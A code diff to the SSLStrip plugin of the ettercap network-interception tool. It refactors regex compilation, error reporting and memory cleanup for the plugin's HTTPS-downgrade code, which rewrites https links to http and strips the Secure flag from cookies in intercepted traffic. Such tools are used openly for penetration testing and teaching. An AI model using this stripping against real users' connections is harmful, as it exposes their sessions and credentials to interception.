@@ -34,6 +34,10 @@
 
 #include <pcre.h>
 
+#ifndef HAVE_STRNDUP
+#include <missing/strndup.h>
+#endif
+
 #ifdef OS_LINUX
 #include <linux/netfilter_ipv4.h>
 #endif
@@ -62,6 +66,7 @@
 //#define URL_PATTERN "(href=|src=|url\\(|action=)?[\"']?(https)://([^ \r\\)/\"'>\\)]*)/?([^ \\)\"'>\\)\r]*)"
 //#define URL_PATTERN "(href=|src=|url\\(|action=)?[\"']?(https)(\\%3A|\\%3a|:)//([^ \r\\)/\"'>\\)]*)/?([^ \\)\"'>\\)\r]*)"
 #define URL_PATTERN "(https://[\\w\\d:#@%/;$()~_?\\+-=\\\\.&]*)"
+#define COOKIE_PATTERN "Set-Cookie: (.*?;)(.?Secure;|.?Secure)(.*?)\r\n"
 
 
 #define REQUEST_TIMEOUT 120 /* If a request has not been used in 120 seconds, remove it from list */
@@ -139,7 +144,8 @@ static int main_fd;
 static u_int16 bind_port;
 static struct pollfd poll_fd;
 
-
+static pcre *https_url_pcre;
+static regex_t find_cookie_re;
 
 /* protos */
 int plugin_load(void *);
@@ -147,6 +153,7 @@ static int sslstrip_init(void *);
 static int sslstrip_fini(void *);
 static void sslstrip(struct packet_object *po);
 static int sslstrip_is_http(struct packet_object *po);
+void safe_free_http_redirect(char **param, int *param_length, char *command, char *orig_command);
 
 #ifndef OS_LINUX
 static void sslstrip_create_session(struct ec_session **s, struct packet_object *po);
@@ -206,15 +213,32 @@ int plugin_load(void *handle)
 
 static int sslstrip_init(void *dummy)
 {
+	const char *error;
+	int erroroffset;
 
 	/*
 	 * Add IPTables redirect for port 80
          */
 	if (http_bind_wrapper() != ESUCCESS) {
-		ERROR_MSG("SSLStrip: Could not set up HTTP redirect\n");
+		USER_MSG("SSLStrip: plugin load failed: Could not set up HTTP redirect\n");
 		return PLUGIN_FINISHED;
 	}
-	
+
+	https_url_pcre = pcre_compile(URL_PATTERN, PCRE_MULTILINE|PCRE_CASELESS, &error, &erroroffset, NULL);
+
+	if (!https_url_pcre) {
+		USER_MSG("SSLStrip: plugin load failed: pcre_compile failed (offset: %d), %s\n", erroroffset, error);
+		http_remove_redirect(bind_port);
+		return PLUGIN_FINISHED;
+	}	
+
+	if(regcomp(&find_cookie_re, COOKIE_PATTERN, REG_EXTENDED | REG_NEWLINE | REG_ICASE)) {
+		USER_MSG("SSLStrip: plugin load failed: Could not compile find_cookie regex\n");
+                pcre_free(https_url_pcre);
+		http_remove_redirect(bind_port);
+		return PLUGIN_FINISHED;
+	}
+
 	hook_add(HOOK_HANDLED, &sslstrip);
 
 	/* start HTTP accept thread */
@@ -230,10 +254,16 @@ static int sslstrip_fini(void *dummy)
 {
 
 	DEBUG_MSG("SSLStrip: Removing redirect\n");
-	if (http_remove_redirect(bind_port) == -EFATAL) {
-		ERROR_MSG("Unable to remove HTTP redirect, please do so manually.");
+	if (http_remove_redirect(bind_port) != ESUCCESS) {
+		USER_MSG("SSLStrip: Unable to remove HTTP redirect, please do so manually.\n");
 	}
 
+        // Free regexes.
+        if (https_url_pcre)
+          pcre_free(https_url_pcre);
+
+        regfree(&find_cookie_re);
+
        /* stop accept wrapper */
        pthread_t pid = ec_thread_getpid("http_accept_thread");
        
@@ -406,17 +436,32 @@ static void Find_Url(u_char *to_parse, char **ret)
    Decode_Url((u_char *)*ret);
 }
 
+/* This function remove variables use by http_insert_redirect and http_remove_redirect functions */
+void safe_free_http_redirect(char **param, int *param_length, char *command, char *orig_command) {
+
+	int k;
+
+	SAFE_FREE(command);
+	SAFE_FREE(orig_command);
+
+	for(k= 0; k < (*param_length); ++k)
+		SAFE_FREE(param[k]);
+	SAFE_FREE(param);
+}
+
 /* HTTP handling functions */
 static int http_insert_redirect(u_int16 dport)
 {
 	char asc_dport[16];
-	int ret_val, i=0;
-	char *command, *p;
+	int ret_val, i=0, param_length= 0;
+	char *command, *orig_command, *p;
 	char **param = NULL;
 
 	if (GBL_CONF->redir_command_on == NULL)
+	{
+		USER_MSG("SSLStrip: cannot setup the redirect, did you uncomment the redir_command_on command on your etter.conf file?");
 		return -EFATAL;
-
+	}
 	snprintf(asc_dport, 16, "%u", dport);
 
 	command = strdup(GBL_CONF->redir_command_on);
@@ -426,6 +471,7 @@ static int http_insert_redirect(u_int16 dport)
 #if defined(OS_DARWIN) || defined(OS_BSD)
 	str_replace(&command, "%set", SSLSTRIP_SET);
 #endif
+        orig_command = strdup(command);
 
 	DEBUG_MSG("http_insert_redirect: [%s]", command);
 
@@ -437,33 +483,45 @@ static int http_insert_redirect(u_int16 dport)
 
 	SAFE_REALLOC(param, (i+1) * sizeof(char *));
 	param[i] = NULL;
+	param_length= i + 1; //because there is a SAFE_REALLOC after the for.
 
 	switch(fork()) {
 		case 0:
 			execvp(param[0], param);
-			exit(EINVALID);
+			WARN_MSG("Cannot setup http redirect (command: %s), please edit your etter.conf file and put a valid value in redir_command_on field\n", param[0]);
+			safe_free_http_redirect(param, &param_length, command, orig_command);
+			_exit(EINVALID);
 		case -1:
-			SAFE_FREE(param);
+			safe_free_http_redirect(param, &param_length, command, orig_command);
 			return -EINVALID;
 		default:
-			SAFE_FREE(param);
 			wait(&ret_val);
-			if (ret_val == EINVALID)
-				return -EINVALID;
+			if (WEXITSTATUS(ret_val)) {
+			    USER_MSG("SSLStrip: redir_command_on had non-zero exit status (%d): [%s]\n", WEXITSTATUS(ret_val), orig_command);
+			    safe_free_http_redirect(param, &param_length, command, orig_command);
+			    return -EINVALID;
+			}
+			break;
 	}
 
+	safe_free_http_redirect(param, &param_length, command, orig_command);
+
 	return ESUCCESS;
 }
 
 static int http_remove_redirect(u_int16 dport)
 {
         char asc_dport[16];
-        int ret_val, i=0;
-        char *command, *p;
+        int ret_val, i=0, param_length= 0;
+	char *command, *orig_command, *p;
         char **param = NULL;
 
+
         if (GBL_CONF->redir_command_off == NULL)
-                return -EFATAL;
+	{
+		USER_MSG("SSLStrip: cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?");
+		return -EFATAL;
+	}
 
         snprintf(asc_dport, 16, "%u", dport);
 
@@ -474,6 +532,7 @@ static int http_remove_redirect(u_int16 dport)
 #if defined(OS_DARWIN) || defined(OS_BSD)
 	str_replace(&command, "%set", SSLSTRIP_SET);
 #endif
+        orig_command = strdup(command);
 
         DEBUG_MSG("http_remove_redirect: [%s]", command);
 
@@ -485,21 +544,29 @@ static int http_remove_redirect(u_int16 dport)
 
         SAFE_REALLOC(param, (i+1) * sizeof(char *));
         param[i] = NULL;
+        param_length= i + 1; //because there is a SAFE_REALLOC after the for.
 
         switch(fork()) {
-                case 0:
-                        execvp(param[0], param);
-                        exit(EINVALID);
+		case 0:
+			execvp(param[0], param);
+			WARN_MSG("Cannot remove http redirect (command: %s), please edit your etter.conf file and put a valid value in redir_command_on field\n", param[0]);
+			safe_free_http_redirect(param, &param_length, command, orig_command);
+			_exit(EINVALID);
                 case -1:
-                        SAFE_FREE(param);
+                        safe_free_http_redirect(param, &param_length, command, orig_command);
                         return -EINVALID;
                 default:
-                        SAFE_FREE(param);
                         wait(&ret_val);
-                        if (ret_val == EINVALID)
-                                return -EINVALID;
+                        if (WEXITSTATUS(ret_val)) {
+                            USER_MSG("SSLStrip: redir_command_off had non-zero exit status (%d): [%s]\n", WEXITSTATUS(ret_val), orig_command);
+                            safe_free_http_redirect(param, &param_length, command, orig_command);
+                            return -EINVALID;
+                        }
+                        break;
         }
 
+        safe_free_http_redirect(param, &param_length, command, orig_command);
+
         return ESUCCESS;
 }
 
@@ -1022,10 +1089,7 @@ EC_THREAD_FUNC(http_child_thread)
 
 static void http_remove_https(struct http_connection *connection)
 {
-	pcre *pcre;
 	char *buf_cpy = connection->response->html;
-	const char *error;
-	int erroroffset;
 	size_t https_len = strlen("https://");
 	size_t http_len = strlen("http://");
 	struct https_link *l, *link;
@@ -1041,18 +1105,10 @@ static void http_remove_https(struct http_connection *connection)
 	if(!buf_cpy)
 		return;
 
-	pcre = pcre_compile(URL_PATTERN, PCRE_MULTILINE|PCRE_CASELESS, &error, &erroroffset, NULL);
-
-	if (!pcre) {
-		ERROR_MSG("pcre_compile failed (offset: %d), %s\n", erroroffset, error);
-		return;
-	}	
-
-
 	SAFE_CALLOC(new_html, 1, connection->response->len);
 	BUG_IF(new_html==NULL);
 
-	while(offset < size && (rc = pcre_exec(pcre, NULL, buf_cpy, size, offset, 0, ovector, 30)) > 0) {
+	while(offset < size && (rc = pcre_exec(https_url_pcre, NULL, buf_cpy, size, offset, 0, ovector, 30)) > 0) {
 		memcpy(new_html+new_size, buf_cpy+offset, ovector[2*i]-offset);
 		new_size += ovector[2*i]-offset;
 
@@ -1289,17 +1345,10 @@ void http_remove_secure_from_cookie(struct http_connection *connection) {
 	size_t pos = 0;
 	char *buf_cpy = connection->response->html;
 	char *new_html;
-	char *cookie_pattern = "Set-Cookie: (.*?;)(.?Secure;|.?Secure)(.*?)\r\n";
 
 	SAFE_CALLOC(new_html, 1, connection->response->len);
 	char changed = 0;
 
-	regex_t find_cookie_re;
-	if(regcomp(&find_cookie_re, cookie_pattern, REG_EXTENDED | REG_NEWLINE | REG_ICASE)) {
-		ERROR_MSG("SSLStrip: Could not compile find_cookie regex");
-		return;
-	}
-
 	regmatch_t match[4];
 
 	while(!regexec(&find_cookie_re, buf_cpy, 4, match, REG_NOTBOL)) {
@@ -1335,7 +1384,7 @@ void http_update_content_length(struct http_connection *connection) {
 
                 char c_length[20];
                 memset(&c_length, '\0', 20);
-                snprintf(c_length, 20, "%u", connection->response->len);
+                snprintf(c_length, 20, "%lu", connection->response->len);
 
                 memcpy(buf+(content_length-buf)-1, c_length, strlen(c_length));
         }
